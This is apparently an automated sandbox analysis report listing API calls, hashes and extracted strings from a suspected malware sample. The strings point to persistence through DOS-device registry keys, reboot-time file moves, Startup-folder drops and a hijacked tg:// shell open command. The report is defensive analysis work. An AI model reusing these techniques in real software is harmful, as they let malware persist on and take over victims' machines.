                                  • Instruction Fuzzy Hash: 4FF0A726911208BEDB12DB90E90BADF73F5EB40758F108494D001E7082EBF4DF84D391
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: __aulldiv$__aulldvrm
                                  • String ID:
                                  • API String ID: 4119620657-0
                                  • Opcode ID: 4eb5ab245642622a0a25c22dc2cf0a800fe594b8a308f5ec97504688320260da
                                  • Instruction ID: 43c0f0c7caa4d485aa74365e723faa3c18075ca83ccd471006530c658ff28231
                                  • Opcode Fuzzy Hash: 4eb5ab245642622a0a25c22dc2cf0a800fe594b8a308f5ec97504688320260da
                                  • Instruction Fuzzy Hash: ECF169246083C18FD7199F2D85541B8FFE79B9A200718C4BFD8EA9BB72C539D648CB11
                                  APIs
                                  • _memset.LIBCMT ref: 0053F6D1
                                  • GetVersionExW.KERNEL32(?), ref: 0053F6EA
                                    • Part of subcall function 005381C8: __CxxThrowException@8.LIBCMT ref: 005381DE
                                    • Part of subcall function 005381C8: __EH_prolog3.LIBCMT ref: 005381EB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Exception@8H_prolog3ThrowVersion_memset
                                  • String ID:
                                  • API String ID: 3528868769-0
                                  • Opcode ID: bb4b0a21f77405e7aad7009bfafbe27ad006e80440f775d425bc0c606da5e42c
                                  • Instruction ID: 548b42f348a0f449726823fd30a8224a9d8712e144462dc49f3079fa8446a8b3
                                  • Opcode Fuzzy Hash: bb4b0a21f77405e7aad7009bfafbe27ad006e80440f775d425bc0c606da5e42c
                                  • Instruction Fuzzy Hash: BF019A3090020A8FDB68EF60D84ABD97BE4BF44704F4080A8E559D7291DF70AE898B91
                                  APIs
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 036418DC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: AdjustPrivilegesToken
                                  • String ID:
                                  • API String ID: 2874748243-0
                                  • Opcode ID: 49a4f8c54fe8e2f2a6b124dc8d7b4ece089099274bdccf730c0a628917e12220
                                  • Instruction ID: 09ae8877161bae84ade197ff3c4c039f7e31a11ebc979e40079a15523389dbfd
                                  • Opcode Fuzzy Hash: 49a4f8c54fe8e2f2a6b124dc8d7b4ece089099274bdccf730c0a628917e12220
                                  • Instruction Fuzzy Hash: 6CF0A2B4900309AFE700DF94C885ABE7BF9FB48304F508559E9059B255D7709A448B95
                                  APIs
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 100018D8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: AdjustPrivilegesToken
                                  • String ID:
                                  • API String ID: 2874748243-0
                                  • Opcode ID: 49a4f8c54fe8e2f2a6b124dc8d7b4ece089099274bdccf730c0a628917e12220
                                  • Instruction ID: 53143a0ca8482a000d6b4ded4d2d76efb65c21e66b1d3043b1fae087c7fd42a3
                                  • Opcode Fuzzy Hash: 49a4f8c54fe8e2f2a6b124dc8d7b4ece089099274bdccf730c0a628917e12220
                                  • Instruction Fuzzy Hash: 12F0A2B4900209AFE700DF54C885ABE7BF9FB48304F508559F9059B251D770AA448B95
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 236fcac6909d5ac101f5923424f6bd85ee021b03b22395ccb9aee7a78b155344
                                  • Instruction ID: 58baf52ab414309b9a3ea0f61b752d29b463db910e412ab107bc22ed908344b9
                                  • Opcode Fuzzy Hash: 236fcac6909d5ac101f5923424f6bd85ee021b03b22395ccb9aee7a78b155344
                                  • Instruction Fuzzy Hash: F2521B71D00215DFDB54CF98C9946ADBBF2FF08355F2081AAE855AB749D730AA90CF90
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a07c49bd521d1946f3e6d7c8c226990916c89b00e7ef3d68ed55a195e7043c0
                                  • Instruction ID: 2a9ad5a725541caab808e8af4279b1112c1507681ada8129af866ecbcf07f026
                                  • Opcode Fuzzy Hash: 1a07c49bd521d1946f3e6d7c8c226990916c89b00e7ef3d68ed55a195e7043c0
                                  • Instruction Fuzzy Hash: 2CD1C5B1A001468FEB48EFB8DCC161E7BE4AB48314F14C57DD21AE73A2DA3C98559B58
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: baf92ad4b0be72b0ed09fe48251c72f10c975de6cad161269829640e85e1453f
                                  • Instruction ID: 76ecee2a5f2c17a239e76bae7030e65e668ff81b5efaf0298e4cd28c6c58b705
                                  • Opcode Fuzzy Hash: baf92ad4b0be72b0ed09fe48251c72f10c975de6cad161269829640e85e1453f
                                  • Instruction Fuzzy Hash: 4EF1D471E002298FDB64CF28C990B9DB7B2BB89314F1581EAC95DA7341D7306E86CF91
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: baf92ad4b0be72b0ed09fe48251c72f10c975de6cad161269829640e85e1453f
                                  • Instruction ID: 8878bc799d59d7e9578ae9d63681dd266ae9f1cb07bf584380dc3f1bcb52fe03
                                  • Opcode Fuzzy Hash: baf92ad4b0be72b0ed09fe48251c72f10c975de6cad161269829640e85e1453f
                                  • Instruction Fuzzy Hash: 95F1D475E002298FEB64CF28C89079DB7B2FB49354F2581EAC94DA7245D7306E85CF91
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 03b6b03b444c7866010a6310b5ae6a3536366f016b7d220786da7b711e854cd2
                                  • Instruction ID: 3b0e4233a0f6d3722b550b4edc18e3a04d79d08a4da01d5b273284f1e8e13640
                                  • Opcode Fuzzy Hash: 03b6b03b444c7866010a6310b5ae6a3536366f016b7d220786da7b711e854cd2
                                  • Instruction Fuzzy Hash: 4291B275B001099FCB18CE6DDC81A9AB7E6EF88350F14813AF805EB395E635DD45CB94
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 50b29fc598e7515b3ee8c3c8e8de6777b75a24a7ca8a6c32a1a8954fa9303b85
                                  • Instruction ID: b92d426b2840306fbefbbf60bfa8ebbad3725dea671ea216cfdb1569fb70fe05
                                  • Opcode Fuzzy Hash: 50b29fc598e7515b3ee8c3c8e8de6777b75a24a7ca8a6c32a1a8954fa9303b85
                                  • Instruction Fuzzy Hash: ED31AF75B0001ACFC7288E3A9D52159BA96AF88380B15C137E806DF7A5E635CD19ABC5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                  • Instruction ID: 7bd83d2a75dd451b7247f1c1b77fe8c9f3ae09419b628bfd42f1f193ed223179
                                  • Opcode Fuzzy Hash: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                  • Instruction Fuzzy Hash: 7331AC36A0876B8FC310DF18C88092AF3F4FF8921CB09096DEA9597312D335F9558B95
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                  • Instruction ID: a576dda6ed6706ff636bab0e30374a64723fb21bf38c1d90f6896eea6bb23e63
                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                  • Instruction Fuzzy Hash: A2110ABBB43141B3E714CA3DDAB46B7EF96EBC5221B2D437AD0428B758D622E145D600
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                  • Instruction ID: 7c9983c2d51c321497ce142cda71ccfcb264f17f5177ddff9d9bdbede1d68c43
                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                  • Instruction Fuzzy Hash: AE119EB724438A43F280CB3DD8B4DEBA3DAEBC71E07294375D0438B65ED13295059500
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8309f7664a9dcc2b9c0cf34492782753835e12f7578b447de968111577be4c28
                                  • Instruction ID: 0de2cb734d9ce7287ea3e9f4f1dd9a78d3aa8c69c7a04fca7176c7fe9d39c662
                                  • Opcode Fuzzy Hash: 8309f7664a9dcc2b9c0cf34492782753835e12f7578b447de968111577be4c28
                                  • Instruction Fuzzy Hash: 7921D521AB0AF607CB448BFCECC451367D18BCA1163ADC3A7DA74C9151D1BDD272C660
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8309f7664a9dcc2b9c0cf34492782753835e12f7578b447de968111577be4c28
                                  • Instruction ID: af8dc597f677515c84aaa7c1ca680f8a378724b7035fa932a96d9af2bafa269f
                                  • Opcode Fuzzy Hash: 8309f7664a9dcc2b9c0cf34492782753835e12f7578b447de968111577be4c28
                                  • Instruction Fuzzy Hash: 8A21D821A74AF607D7448BFCECC051327D1DB8915636DC367DA64C9051D0BED672C550
                                  APIs
                                  • _wprintf.LIBCMT ref: 10001192
                                  • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,1001A5D4,0000000A), ref: 100011B0
                                  • RegCloseKey.ADVAPI32(?), ref: 100011C0
                                  • _memset.LIBCMT ref: 100012B7
                                  • RegCloseKey.ADVAPI32(?), ref: 100012EE
                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000), ref: 100012FF
                                  • _memset.LIBCMT ref: 10001318
                                  • _sprintf.LIBCMT ref: 100013C3
                                  • _memset.LIBCMT ref: 10001471
                                  • RegCreateKeyExA.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 10001496
                                  • _sprintf.LIBCMT ref: 100014B7
                                  • RegSetValueExA.ADVAPI32(?,1001A62C,00000000,00000001,?,?), ref: 100014E8
                                  • _sprintf.LIBCMT ref: 10001509
                                  • DefineDosDeviceA.KERNEL32(00000001,1001A62C,?), ref: 1000151B
                                  • _memset.LIBCMT ref: 1000154C
                                  • _sprintf.LIBCMT ref: 10001566
                                  • _memset.LIBCMT ref: 100015A7
                                  • _memset.LIBCMT ref: 100015BE
                                  • _memset.LIBCMT ref: 10001619
                                  • _memset.LIBCMT ref: 1000162D
                                  • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 1000165A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _memset$_sprintf$CloseValue$CreateDefineDeviceFileFolderMovePathSpecial_wprintf
                                  • String ID: %s\1.qwq1$%s\Mic$.qwq$1$QWQ\ShellEx\ContextMenuHandlers\{00021401-0000-0000-C000-000000000046}$SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices$[:\1.qwq1$art Me$grams$nu\Pro$ows\St$rosoft\Wind
                                  • API String ID: 1177859221-1427731300
                                  • Opcode ID: 0b30ea9c887d113786127fb0fe131acf0ce7c388d6d05fd3aa7cff60e868827e
                                  • Instruction ID: a6eba57ee7157bfdc474ef77063ead9024457ec1a50b4f639e4453205c2468a6
                                  • Opcode Fuzzy Hash: 0b30ea9c887d113786127fb0fe131acf0ce7c388d6d05fd3aa7cff60e868827e
                                  • Instruction Fuzzy Hash: 12D179B180126DAEEB21DF548D84FEAB7BDEB05380F0045E5E649AB105DA709FC58FA0
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100031EE
                                  • _strrchr.LIBCMT ref: 100031FD
                                  • _strncpy.LIBCMT ref: 100032A6
                                  • _memset.LIBCMT ref: 100032D2
                                  • _memset.LIBCMT ref: 10003344
                                  • _sprintf.LIBCMT ref: 1000335E
                                    • Part of subcall function 10002F16: LoadLibraryA.KERNEL32(?,?), ref: 10002F6E
                                    • Part of subcall function 10002F16: GetProcAddress.KERNEL32(00000000), ref: 10002F75
                                  • _memset.LIBCMT ref: 10003425
                                  • _sprintf.LIBCMT ref: 10003438
                                    • Part of subcall function 1000AD50: __output_l.LIBCMT ref: 1000ADAB
                                  • _memset.LIBCMT ref: 1000349D
                                  • LoadLibraryA.KERNEL32(?,?,00000000,000000F3,?,?,?,?,?,00000000,000000D8,?,?,?,?,?), ref: 100034AC
                                  • _memset.LIBCMT ref: 100034EC
                                  • GetProcAddress.KERNEL32(?,?), ref: 10003501
                                  • _memset.LIBCMT ref: 1000352A
                                  • FreeLibrary.KERNEL32(?,?,?,?,?,00000000,000000F1,?,?,?,?,?,00000000,000000D8), ref: 10003555
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _memset$Library$AddressLoadProc_sprintf$FileFreeModuleName__output_l_strncpy_strrchr
                                  • String ID: %s\tg\shell\open\command$-- tg://setlanguage?lang=classic-zh-cn$A$Open$Shel$Shel$_Classes$cute$d$dll$l32.$lExe
                                  • API String ID: 1778617766-3396513812
                                  • Opcode ID: de30c5cdb71a66d09e6c21ac387def07262357a523ce7049645e96b0468760d0
                                  • Instruction ID: a1104d94dd440214b8363c757a0762cb0449f268d632bcc907b58f935efa182f
                                  • Opcode Fuzzy Hash: de30c5cdb71a66d09e6c21ac387def07262357a523ce7049645e96b0468760d0
                                  • Instruction Fuzzy Hash: C79170B5C0426D9AEB22DF54CC81BEEB7BCEB04780F4081E5E608A6155D775AFC98F60
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 036431F2
                                  • _strncpy.LIBCMT ref: 036432AA
                                  • _memset.LIBCMT ref: 036432D6
                                  • _memset.LIBCMT ref: 03643348
                                  • _sprintf.LIBCMT ref: 03643362
                                    • Part of subcall function 03642F1A: LoadLibraryA.KERNEL32(?,?), ref: 03642F72
                                    • Part of subcall function 03642F1A: GetProcAddress.KERNEL32(00000000), ref: 03642F79
                                  • _memset.LIBCMT ref: 03643429
                                  • _sprintf.LIBCMT ref: 0364343C
                                    • Part of subcall function 0364AD54: __output_l.LIBCMT ref: 0364ADAF
                                  • _memset.LIBCMT ref: 036434A1
                                  • LoadLibraryA.KERNEL32(?,?,00000000,000000F3,?,?,?,?,?,00000000,000000D8,?,?,?,?,?), ref: 036434B0
                                  • _memset.LIBCMT ref: 036434F0
                                  • GetProcAddress.KERNEL32(?,?), ref: 03643505
                                  • _memset.LIBCMT ref: 0364352E
                                  • FreeLibrary.KERNEL32(?,?,?,?,?,00000000,000000F1,?,?,?,?,?,00000000,000000D8), ref: 03643559
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _memset$Library$AddressLoadProc_sprintf$FileFreeModuleName__output_l_strncpy
                                  • String ID: %s\tg\shell\open\command$-- tg://setlanguage?lang=classic-zh-cn$A$Open$Shel$Shel$_Classes$cute$d$dll$l32.$lExe
                                  • API String ID: 41527467-3396513812
                                  • Opcode ID: de30c5cdb71a66d09e6c21ac387def07262357a523ce7049645e96b0468760d0
                                  • Instruction ID: 40ab0d075377ac2c1f558fb12dfc00fd8ee71b8e0f6e078244b6347b99660087
                                  • Opcode Fuzzy Hash: de30c5cdb71a66d09e6c21ac387def07262357a523ce7049645e96b0468760d0
                                  • Instruction Fuzzy Hash: DB919DB5C0426DAADB21DF54CD80BEEBBBDAB05700F1481E9D64CA7241D7349BC98F64
                                  APIs
                                  • GdipGetImagePixelFormat.GDIPLUS(?,?,00000000,00000000,0073BF7C), ref: 004254AC
                                  • GdipGetImageHeight.GDIPLUS(?,?), ref: 0042552D
                                  • GdipGetImageWidth.GDIPLUS(?,?), ref: 00425555
                                  • GdipGetImagePaletteSize.GDIPLUS(?,?,00000000,?,?,00000000,00000000,?), ref: 004255B6
                                  • _malloc.LIBCMT ref: 004255F7
                                    • Part of subcall function 0063A2D7: __FF_MSGBANNER.LIBCMT ref: 0063A2F0
                                    • Part of subcall function 0063A2D7: __NMSG_WRITE.LIBCMT ref: 0063A2F7
                                    • Part of subcall function 0063A2D7: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00646709,00000000,00000001,00000000,?,00649909,00000018,0071ACE0,0000000C,00649999), ref: 0063A31C
                                  • _free.LIBCMT ref: 0042563F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: GdipImage$AllocateFormatHeapHeightPalettePixelSizeWidth_free_malloc
                                  • String ID: &
                                  • API String ID: 4101255611-3042966939
                                  • Opcode ID: dc5093ca38ae2d5387a9d4564f6f30686d87e2b50f3620c683253e88f8e2b187
                                  • Instruction ID: da598ec3ef59f7b05732924bef539a40e6e40d994cf5092463715e4a608f0960
                                  • Opcode Fuzzy Hash: dc5093ca38ae2d5387a9d4564f6f30686d87e2b50f3620c683253e88f8e2b187
                                  • Instruction Fuzzy Hash: 59D173B1A006299FDB20DF54DC80BAAB7B5FF48304F8085ADE60997241D774AEC5CF99
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _memset$_sprintf$DefineDeviceFileMoveValue
                                  • String ID: %s\1.qwq1$.qwq$1$[:\S$tart$up\1
                                  • API String ID: 3652080668-2429600194
                                  • Opcode ID: c779772ebf056492f089e2d5d69f42e55331b74a04850cbd1dbf54744bd0d102
                                  • Instruction ID: b2380dd1c437b5f8a3eea6d21b2fd3a4f3bea511eeef2494297a30c5d12eddd6
                                  • Opcode Fuzzy Hash: c779772ebf056492f089e2d5d69f42e55331b74a04850cbd1dbf54744bd0d102
                                  • Instruction Fuzzy Hash: 214161B5D4122DAFDB21DBA4DC48FEA77BDAF09200F0485E5D64DE7201DA348B888F55
                                  APIs
                                    • Part of subcall function 0053B5F7: GetWindowLongW.USER32(?,000000F0), ref: 0053B602
                                  • GetParent.USER32(?), ref: 0053E421
                                  • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 0053E442
                                  • GetWindowRect.USER32(?,?), ref: 0053E461
                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0053E493
                                  • MonitorFromWindow.USER32(00000000,00000001), ref: 0053E4C7
                                  • GetMonitorInfoW.USER32(00000000), ref: 0053E4CE
                                  • CopyRect.USER32(?,?), ref: 0053E4E2
                                  • CopyRect.USER32(?,?), ref: 0053E4EC
                                  • GetWindowRect.USER32(00000000,?), ref: 0053E4F5
                                  • MonitorFromWindow.USER32(00000000,00000002), ref: 0053E502
                                  • GetMonitorInfoW.USER32(00000000), ref: 0053E509
                                  • CopyRect.USER32(?,?), ref: 0053E517
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Window$Rect$Monitor$Copy$FromInfoLong$MessageParentSend
                                  • String ID: (
                                  • API String ID: 783970248-3887548279
                                  • Opcode ID: 276ea092bf93a70f3c38623cfd06847fa14e4bab135780feb1e05cc8ec6b7688
                                  • Instruction ID: dd166eb13ffc59d9dcdc0091d5b1a3894dccb50b4e947ab55323b646ce479f65
                                  • Opcode Fuzzy Hash: 276ea092bf93a70f3c38623cfd06847fa14e4bab135780feb1e05cc8ec6b7688
